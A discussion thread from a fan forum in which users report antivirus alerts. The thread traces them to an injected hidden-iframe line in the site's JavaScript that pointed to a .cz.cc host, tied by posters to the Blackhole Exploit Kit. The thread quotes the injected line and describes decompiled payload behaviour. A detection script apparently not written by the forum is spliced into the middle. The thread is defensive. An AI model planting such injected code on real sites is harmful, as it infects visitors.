Guys Be Careful!
-
-
Ehh, I don't see anything. I'll need more to go on.
Well it isn't blocked at work - maybe just an Avast issue - I'll take a look when I get home in 8 hours or so and give you anything the notifications have on it.
-
Still no problems here.
-
found it
http://www.apforums.net/clientscript/yui/connection/connection-min.js?v=415
document.write("<iframesrc='http://xdfhsryjdtyksetjhsrg.cz.cc/main.php?page=d50dc938030df4b7' width="1" height="1" frameborder="0">")
---
you know what... I think they have some sort of backdoor in server.
-
Ehh, I don't see anything. I'll need more to go on.
Infection Details URL: http://forums.arlongpark.net/clientscript/yui/connection/connection-min.js?v Process: file://C:\Program Files (x86)\Mozilla Firefox\firefox.exe Infection: html:Iframe-inf Not sure if that helps - from Avast occurs on any forum thread. Tried to clean up the text but it won't let me.
-
This is what I got from NOD32 as I opened the forum (front page): http://apforums.net/clientscript/yui/connection/connection-min.js?v=415 Threat identified as: HTML/Iframe.B.Gen Virus Seems like this can happen on any page (even this), since I seem to get the warning every time I refresh this page!
-
It's weird. I can see the js file and it's actually pretty huge. But I don't see any iframe code in it anywhere. But I'll take your guys word for it and shut it down for now.
-
Well now if I post a link at the top of the page no matter what I do it stays bundled together with the rest of the text and I can't put any space between them, no matter what I do. Hell I can't even start a new paragraph, because even when I type it on another line it just deletes all the spaces and puts it right back, turning everything I post into an intelligible wall of text.
-
It's weird. I can see the js file and it's actually pretty huge. But I don't see any iframe code in it anywhere.
It's not exactly iframe. Whoever injected it made a typo.
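A sketch of the kind of check the posts above point to, added here as an example and not code from the forum or from vBulletin: it flags document.write calls that emit an iframe tag, including the run-together "<iframesrc=" form quoted earlier, which a search for a well-formed "<iframe src" would miss. The sample script text, the host names and the function name scan_js are constructed for illustration.

```python
import re

# document.write( "<iframe... )  -- the text after "iframe" is captured as "rest".
# Not requiring a space after "iframe" is what lets "<iframesrc=" match.
DOC_WRITE_IFRAME = re.compile(
    r"document\.write\s*\(\s*[\"']\s*<\s*iframe(?P<rest>.*?)\)", re.I | re.S)
HOST = re.compile(r"https?://([^/'\"\s>]+)", re.I)
# width/height of 0 or 1 (quoted or not) marks an effectively invisible frame.
TINY = re.compile(r"\b(?:width|height)\s*=\s*[\"']?[01][\"']?(?!\d)", re.I)


def scan_js(text, trusted_hosts):
    """Return one finding per document.write call that emits an iframe tag."""
    findings = []
    for m in DOC_WRITE_IFRAME.finditer(text):
        rest = m.group("rest")
        external = [h.lower() for h in HOST.findall(rest)
                    if h.lower() not in trusted_hosts]
        # A real tag name is followed by whitespace, ">" or "/".
        malformed = re.match(r"[\s>/]", rest) is None
        hidden = len(TINY.findall(rest)) >= 2
        findings.append({
            "line": text.count("\n", 0, m.start()) + 1,
            "malformed_tag": malformed,
            "hidden": hidden,
            "external_hosts": external,
            "suspicious": bool(external) and (malformed or hidden),
        })
    return findings


# Constructed sample: stand-in library code, one injected line, one benign line.
SAMPLE = r'''var YAHOO={util:{Connect:{}}};
YAHOO.util.Connect.asyncRequest=function(m,u,c){return{tId:1}};
document.write("<iframesrc='http://injected.example/main.php?page=0000' width='1' height='1' frameborder='0'>")
document.write("<iframe src='http://forum.example/help.html' width='600' height='400'></iframe>")
'''

if __name__ == "__main__":
    for finding in scan_js(SAMPLE, trusted_hosts={"forum.example"}):
        print(finding)
```

A plain-text pattern like this misses encoded or obfuscated injections, so comparing the served file's hash against the vendor's original copy remains the stronger check.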
-
@No:
Well now if I post a link at the top of the page no matter what I do it stays bundled together with the rest of the text and I can't put any space between them, no matter what I do. Hell I can't even start a new paragraph, because even when I type it on another line it just deletes all the spaces and puts it right back, turning everything I post into an intelligible wall of text.
Yeah, I know. The js file has to be fixed first. At the moment it's simply set to not load since it's infected.
-
I don't know if my computer is just a piece of shit or what, but the multi-quote button isn't working for me. Figured I'd throw this here instead of making a new thread because it doesn't seem thread-worthy.
The regular quote button is working, though.
-
Things should be working now.
-
Ah, yes.
Thank you, Urouge.~
-
Lemme see.
Post .
Edit: Yeah it works. Thanks Urouge.
But while we're on the topic, I find that every time when someone posts a link and then starts typing the first letters after the link, even when you edit the URL tags, still get absorbed into the link. It still works but it is sort of annoying. Any idea what causes that?
-
Things should be working now.
It did when I checked it this morning at home thanks Urouge - I would probably go insane if I couldn't access this site from work :sad:
-
I've been getting virus threats on the forum.
So yeah, please look into it.
-
I got attacked again just now. Why does this keep happening?
-
Same. Getting blocked stuff.
-
Apparently it's back again, since my NIS is stopping an intrusion attempt by dfgjahkdjsfasfsdgafg.cz.cc on every page I go to on this site this morning.
-
Er… Sorry to give more trouble, but I've been having messages on my end too, and I've never had virus trouble with this site before. Microsoft Security Essentials keeps popping up, and the Adobe Acrobat plugin crashes at the same time (though I didn't click anything).
I've clicked Clean Computer multiple times, but the message keeps coming back.
Thanks :)
-
same file as before infected again
--- Update From New Post Merge ---
okay just finished de-compiling the virus code, this is what it does.
it detects your OS and browser and java version and java vendor and loads virus file accordingly (jar and .pdf files). and adobe crashes because it tries to inject another javascript via adobe. It tries to write a file to user's system according to his OS (which uploads and mails some data (what data - I don't know)).
Here are some of the decoded virus files (source codes). Maybe someone with more time and better skills can get more:
Worm.jar
Mailagent: http://pastebin.com/p7kBHCwV
VirtualTable: http://pastebin.com/NrypDDRX
Classid: http://pastebin.com/tF2MqwLq
Classtype: http://pastebin.com/sRQvRTAd
cid: http://pastebin.com/QU7KXdL0
---
the code detecting java version and vendor: http://pastebin.com/FDgVqFp6
javascript detecting os etc and loading pdf files: http://pastebin.com/fLnCdq3w
pdf file with js: http://pastebin.com/GHV2cLv7
@Urouge, Brennen and other admins: I know you guys work really hard and I am fully aware that maintaining a site such as apforums is no easy task. But considering how frequently the files are getting infected and how worms which mail and upload stuff (can be anything from keylogger to spam mailers to … everything), don't you think there should be a permanent solution by now?
--- Update From New Post Merge ---
just noticed that javascript in status bar (left bottom corner). There should be nothing on apforums which might have caused that to show. Any ideas where was your mouse when you took that screenshot?
(I think that either that adobe crash or windows essential msg is fake).
-
same file as before infected again
--- Update From New Post Merge ---
okay just finished de-compiling the virus code, this is what it does.
it detects your OS and browser and java version and java vendor and loads virus file accordingly (jar and .pdf files). and adobe crashes because it tries to inject another javascript via adobe. It tries to write a file to user's system according to his OS (which uploads and mails some data (what data - I don't know)).
Here are some of the decoded virus files (source codes). Maybe someone with more time and better skills can get more:
Worm.jar
Mailagent: http://pastebin.com/p7kBHCwV
VirtualTable: http://pastebin.com/NrypDDRX
Classid: http://pastebin.com/tF2MqwLq
Classtype: http://pastebin.com/sRQvRTAd
cid: http://pastebin.com/QU7KXdL0
---
the code detecting java version and vendor: http://pastebin.com/FDgVqFp6
javascript detecting os etc and loading pdf files: http://pastebin.com/fLnCdq3w
pdf file with js: http://pastebin.com/GHV2cLv7
@Urouge, Brennen and other admins: I know you guys work really hard and I am fully aware that maintaining a site such as apforums is no easy task. But considering how frequently the files are getting infected and how worms which mail and upload stuff (can be anything from keylogger to spam mailers to … everything), don't you think there should be a permanent solution by now?
--- Update From New Post Merge ---
just noticed that javascript in status bar (left bottom corner). There should be nothing on apforums which might have caused that to show. Any ideas where was your mouse when you took that screenshot?
(I think that either that adobe crash or windows essential msg is fake).
I'm getting nothing on my end.
Should I be worried in light of what you posted?
-
@No:
I'm getting nothing on my end.
Should I be worried in light of what you posted?
nothing on your end because browsers have started blocking the infected url in question.
About worried… I don't know. With a worm this complex, a lot depends on your antivirus, flash and java versions.
-
Yeah it's the Blackhole Exploit Kit. I got it too, now it seems to be gone. If you get infected, I think it will launch a fake virus scanner which tells u u have many virus infections and prompts you to buy it. You probably won't be able to do anything with your PC anymore (I had something similar happen to me a month or two ago, googled it on another PC, then manually removed it in safe mode).
Funny when I read up on the Blackhole Exploit Kit: "the kit will cost $1,500 annually, $1,000 for a half-year and $700 for 3 months. (..) Even though the price of this exploit kit is high, it remains a sought after commodity."
-
Yeah it's the Blackhole Exploit Kit. I got it too, now it seems to be gone. If you get infected, I think it will launch a fake virus scanner which tells u u have many virus infections and prompts you to buy it. You probably won't be able to do anything with your PC anymore (I had something similar happen to me a month or two ago, googled it on another PC, then manually removed it in safe mode).
Funny when I read up on the Blackhole Exploit Kit: "the kit will cost $1,500 annually, $1,000 for a half-year and $700 for 3 months. (..) Even though the price of this exploit kit is high, it remains a sought after commodity."
I looked this up and how anyone can sell it like that is a mystery to me.
-
I disconnected my Internet for a while. Came back on and got the Security Essentials thing as well as this which has never appeared anywhere before:
@FF Hmm I'll see if I can remember what triggered that javascript thing at the bottom.
--- Update From New Post Merge ---
just noticed that javascript in status bar (left bottom corner). There should be nothing on apforums which might have caused that to show. Any ideas where was your mouse when you took that screenshot?
(I think that either that adobe crash or windows essential msg is fake).
Mm I moused around but can't find it anymore. I think that most likely, it was when I moused over the notification at the top telling me Adobe Acrobat had crashed, see details, send crash report, etc. It's not appearing anymore though, and neither is the Essentials message. The message I just posted still pops up every time I come here, though.
-
I just got the same.
-
So long as AVG keeps kicking its ass, I don't have anything to worry about no matter how many times it attacks me, I assume.
-
@No:
I looked this up and how anyone can sell it like that is a mystery to me.
stuff like this sells for a lot in underground forums. and $1000 per year is not high at all.
-
Yeah I'm getting "This site is a reported attack site" when visiting the main page at least. It seems to only be that page.
-
It's taken care of. Trust me every time it happens we're taking action that will either narrow it down or eliminate it. I'm not going to go into specifics but we know a lot more of what's happening now than we did two weeks ago.
-
good to know that
-
It's taken care of. Trust me every time it happens we're taking action that will either narrow it down or eliminate it. I'm not going to go into specifics but we know a lot more of what's happening now than we did two weeks ago.
Glad to read that, because it started with me, too, today and I was quite surprised by it.
-
Yeah every time I go to a new page on here I get the "this site may harm your computer" warnings
-
Yeah every time I go to a new page on here I get the "this site may harm your computer" warnings
You can ignore it now since it's been fixed. But help getting it unlisted by clicking "this is not a harmful site". and you can browse using http://forums.arlongpark.net/
-
It's happening to me right now.
-
Same here + adobe player always crashed a while ago
-
It's taken care of. Trust me every time it happens we're taking action that will either narrow it down or eliminate it. I'm not going to go into specifics but we know a lot more of what's happening now than we did two weeks ago.
That's good then, I was a bit worried.
-
@Urouge, Brennen and other admins: I know you guys work really hard and I am fully aware that maintaining a site such as apforums is no easy task. But considering how frequently the files are getting infected and how worms which mail and upload stuff (can be anything from keylogger to spam mailers to … everything), don't you think there should be a permanent solution by now?
The problem is more widespread than us. Other forums have the same exact issue, to which vBulletin released a patch that doesn't work. There have been more than just what has been reported as well, so like Urouge said, we are narrowing it down little by little. Once we know it won't be bothering us again, I'll get Google off our back.
-
Google warned me today.. I use linux so I just went straight through. Linux ftw!
Also, I thought the forum started getting ads and one of them was the cause of the infection, which is normally the case with most sites which this happens to. Good to see it isn't true.
Noscript + Adblockplus + Firefox + Linux = Mandatory Browsing kit.
-
Yeah, I got a warning from Google today. First time I ever got any kind of malware warning.
-
Just got it popping up saying "this site will nuke your pc, do you want to continue?"
My i7+massive security laughs at this idea.
-
I just got this site as a big red box saying this is an attack site.. I had to tell the Firefox it wasn't.. what's going on here?
-
Basically the admins have stolen all your credit card details to fund the next Disneyland trip.
-
Same for me… Big red attack warning with firefox
-
Me too.
I was almost afraid to go back onto the site.
-
I'm using Google Chrome, at the moment, and today I already got twice the red screen with the "Beware - Malware" alert, when trying to open this forum.
-
The issue is fixed, it's just Google that doesn't know it yet.
-
Just went to AP news page and Google Chrome detected malware but Avast didn't, anyone got this too?
-
Ok staying off the site until the situation is fixed.. hopefully this site just didn't slow down my computer